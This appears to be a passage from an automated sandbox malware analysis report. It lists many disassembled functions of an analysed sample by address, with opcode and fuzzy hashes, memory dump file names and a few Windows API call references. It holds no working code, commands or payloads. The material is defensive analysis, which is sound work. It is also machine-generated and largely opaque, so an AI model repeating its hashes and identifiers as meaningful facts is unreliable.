                                    • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction Fuzzy Hash: 8AB13931610659DFDB16CF29C48AB647BA0FF45364F2A865DE899CF2E2C335E981CB40
                                    Function 003BB198 Relevance: .3, Instructions: 268COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction ID: ebabc277074b1131ccb99217180070ebc733f601f788e906bb961aa2b1302eb1
                                    • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction Fuzzy Hash: AAC13975A0471A8FC715DF28C08045AB3F2FF88354F258A6DE8999B721D731E9A6CF81
                                    Function 003CD5A8 Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction ID: 86f045a10e922aefc039a37cc7ed1636e9704a443e45c634e9e21204bdd67b02
                                    • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction Fuzzy Hash: 0D915A319287916AEB178B38CC41BAAF754FFE6350F14C32EF988B2491FB7189818344
                                    Function 003DD39E Relevance: .2, Instructions: 242COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction ID: b074b1b568e8d13378c0c8a1008854fa690d07b61d309439b970f6ca70530080
                                    • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction Fuzzy Hash: 2FA12072A10A19CBEB1ACF59DCC1A9EBBB1FB54314F15C62AD41AE73A0D334A944CF50
                                    Function 003A4288 Relevance: .2, Instructions: 240COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction ID: 82879e26e6f9715d8be39d64145617bb0507c443543606f726efd7dcbc829166
                                    • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction Fuzzy Hash: 3BA17072E087119BD308CF25C89075BF7E2EFC8710F1ACA3DA89997254D7B4E9419B82
                                    Function 007886D2 Relevance: .2, Instructions: 196COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aa24c1919adfb2ef64672ef17596195f8695434fa119ae3795f3fb98e1cb6805
                                    • Instruction ID: df5f9b292cb89f8702db196c97908ac8d194b1165a802ecc0ad7997bd519944d
                                    • Opcode Fuzzy Hash: aa24c1919adfb2ef64672ef17596195f8695434fa119ae3795f3fb98e1cb6805
                                    • Instruction Fuzzy Hash: 4C51F7F3A0C3045BE3146A6CEC8577AB7D5DB94320F1A463CEB9893781ED3D98058296
                                    Function 006B228B Relevance: .2, Instructions: 171COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fd4729dc69b35022e2d4e09234d6b1d0263f6b8f6feccb9d3d0af832978cf32
                                    • Instruction ID: 55c0f5908937c33781dbd5170d4b36783d4ec974852cbcfd8d6344f9f52cb98f
                                    • Opcode Fuzzy Hash: 2fd4729dc69b35022e2d4e09234d6b1d0263f6b8f6feccb9d3d0af832978cf32
                                    • Instruction Fuzzy Hash: 3851F6F3F146105FF3046939DD887AAB6D6EBD4320F2B863DDA88977C4E97988054282
                                    Function 006DBE1A Relevance: .2, Instructions: 166COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f5a2a0e26ee938d4b4fb4225eee7579d5ed7fd58f29bad5499492f8829eb5465
                                    • Instruction ID: a9cce8188fca2c7bb4161ade96895191b996b6decf92bb3362e912d1036aeaa1
                                    • Opcode Fuzzy Hash: f5a2a0e26ee938d4b4fb4225eee7579d5ed7fd58f29bad5499492f8829eb5465
                                    • Instruction Fuzzy Hash: 16414AF3A087049BE3107E6DEDC577AFBD9EB94320F1A063EDAC487780E57519008696
                                    Function 003D6799 Relevance: .1, Instructions: 131COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: 3e13c67e53a66e11ad21b0a8e3b93665c63924e10131da6053934dd8b904429f
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 47513C63E09BD989C7068B7544502EEBFB21FE6210F1E829EC4A81F383C3755689D3E5
                                    Function 00824858 Relevance: .1, Instructions: 106COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65d14e018be6aa886e83c3e34861a0f54dabaf098ae4437d54ca096c462a265c
                                    • Instruction ID: f3c5c733c6f1c8762ea9c88b1f4e026c315718bc15ca16b248e867aa97533268
                                    • Opcode Fuzzy Hash: 65d14e018be6aa886e83c3e34861a0f54dabaf098ae4437d54ca096c462a265c
                                    • Instruction Fuzzy Hash: E731A5B250C704AFE309AE69DC416BAFBE4EF88720F15492DF6C5C3240D6355840C697
                                    Function 00834B92 Relevance: .1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 34f222a395e379bd34ee93c2568fd243d1e21452a68eed2362074fa08e25a98e
                                    • Instruction ID: e5943f69042ea1fcbb41b27ce8eee388c2d8e3e7672006adcc918182b6cde2df
                                    • Opcode Fuzzy Hash: 34f222a395e379bd34ee93c2568fd243d1e21452a68eed2362074fa08e25a98e
                                    • Instruction Fuzzy Hash: 793107B211C7089FE711BE68DCC17BAFBE5EF18260F06492DE6D083610E675A8408A97
                                    Function 003A75A8 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                    • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                    • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                    • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                    Function 00379AA0 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 003703B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 00378F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378F9B
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
